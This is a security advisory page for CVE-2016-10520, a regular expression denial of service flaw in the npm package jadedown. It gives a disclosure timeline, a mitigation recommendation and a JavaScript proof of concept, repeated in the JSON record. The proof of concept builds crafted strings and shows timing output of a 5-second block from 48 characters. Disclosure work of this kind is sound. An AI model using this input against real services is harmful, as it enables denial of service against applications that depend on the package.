GHSA-6354-6MHV-MVV5

Vulnerability from github – Published: 2019-02-18 23:38 – Updated: 2023-09-11 22:25
VLAI?
Summary
Regular Expression Denial of Service in jadedown
Details

The jadedown package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in.

Proof of concept

var jadedown = require('jadedown');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=1;i<=10000000;i=i+1) {
    console.log("COUNT: " + i);
    var str = genstr(i, 'f') + genstr(i, '#') + '{';
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    jadedown(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results demonstrating blocking for 5 seconds using only 48 characters.

$ node jadedown.js
COUNT: 1
LENGTH: 6
[ 0, 4014065 ]
COUNT: 4
LENGTH: 12
[ 0, 503507 ]
COUNT: 7
LENGTH: 18
[ 0, 325225 ]
COUNT: 10
LENGTH: 24
[ 0, 1632684 ]
COUNT: 13
LENGTH: 30
[ 0, 7541230 ]
COUNT: 16
LENGTH: 36
[ 0, 80889495 ]
COUNT: 19
LENGTH: 42
[ 0, 636009936 ]
COUNT: 22
LENGTH: 48
[ 5, 820586760 ]

Timeline

  • October 24, 2015 - Vulnerability Identified
  • October 24, 2015 - Maintainers Notified
  • October 25, 2015 - Response from Maintainers with intent to fix
  • January 5, 2016 - Advisory Published
  • January 11, 2016 - CVE Requested

Recommendation

This package is not actively maintained, and has not seen an update since 2011.

The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.

Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jadedown"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2016-10520"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:17:50Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "The `jadedown` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in.\n\n\n### Proof of concept\n```js\nvar jadedown = require(\u0027jadedown\u0027);\n\nvar genstr = function (len, chr) {\n    var result = \"\";\n    for (i=0; i\u003c=len; i++) {\n        result = result + chr;\n    }\n\n    return result;\n}\n\n\nfor (i=1;i\u003c=10000000;i=i+1) {\n    console.log(\"COUNT: \" + i);\n    var str = genstr(i, \u0027f\u0027) + genstr(i, \u0027#\u0027) + \u0027{\u0027;\n    console.log(\"LENGTH: \" + str.length);\n    var start = process.hrtime();\n    jadedown(str)\n\n    var end = process.hrtime(start);\n    console.log(end);\n}\n\n```\n\nResults demonstrating blocking for 5 seconds using only 48 characters.\n\n```\n$ node jadedown.js\nCOUNT: 1\nLENGTH: 6\n[ 0, 4014065 ]\nCOUNT: 4\nLENGTH: 12\n[ 0, 503507 ]\nCOUNT: 7\nLENGTH: 18\n[ 0, 325225 ]\nCOUNT: 10\nLENGTH: 24\n[ 0, 1632684 ]\nCOUNT: 13\nLENGTH: 30\n[ 0, 7541230 ]\nCOUNT: 16\nLENGTH: 36\n[ 0, 80889495 ]\nCOUNT: 19\nLENGTH: 42\n[ 0, 636009936 ]\nCOUNT: 22\nLENGTH: 48\n[ 5, 820586760 ]\n```\n\n# Timeline\n- October 24, 2015 - Vulnerability Identified\n- October 24, 2015 - Maintainers Notified\n- October 25, 2015 - Response from Maintainers with intent to fix\n- January 5, 2016 - Advisory Published\n- January 11, 2016 - CVE Requested\n\n\n## Recommendation\n\nThis package is not actively maintained, and has not seen an update since 2011. \n\nThe package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.",
  "id": "GHSA-6354-6mhv-mvv5",
  "modified": "2023-09-11T22:25:25Z",
  "published": "2019-02-18T23:38:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10520"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-6354-6mhv-mvv5"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/52"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Regular Expression Denial of Service in jadedown"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.